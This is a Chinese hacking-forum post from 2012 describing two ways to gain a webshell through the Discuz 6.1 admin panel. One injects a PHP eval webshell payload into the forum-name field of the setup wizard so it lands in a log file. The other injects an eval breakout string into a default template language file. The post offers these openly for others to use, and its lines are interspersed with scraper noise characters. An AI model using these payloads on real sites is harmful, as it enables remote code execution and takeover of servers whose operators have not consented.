找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2242|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
discuz6.1两种方法后台拿shell/ c8 f+ D8 L  S& _! }
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下0 W5 e  B4 y1 l8 y& Y7 F/ h
1:
+ g; _+ }8 |0 @9 [3 D5 @http://127.0.0.1/discuz/admincp. ... zard&frames=yes
9 E. o5 M- l; \3 J( S, r, M9 {; X' cadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell4 Q: o& R" W( t1 @
<?php eval($_POST[cmd]);?>
" X3 R% X6 j# `* L" W后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
- `8 I8 Q  k9 y% O5 Q
7 U$ U9 J1 l! p7 t4 f
/ ~: b5 v! v$ `2:后台模板管理--默认模板套系--详情
% K/ p4 N& R7 @/ t. e+ |/ S( jtemplates/default/actions.lang.php) C9 e  o+ W' m) B
jhackj\\');eval($_POST[cmd])?>;//
+ G' s% m. S8 `* ~, w- ^: A4 H# P
0 W# Z3 p  Z& i: {) R9 ]利用很简单,聪明的人一看就懂了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表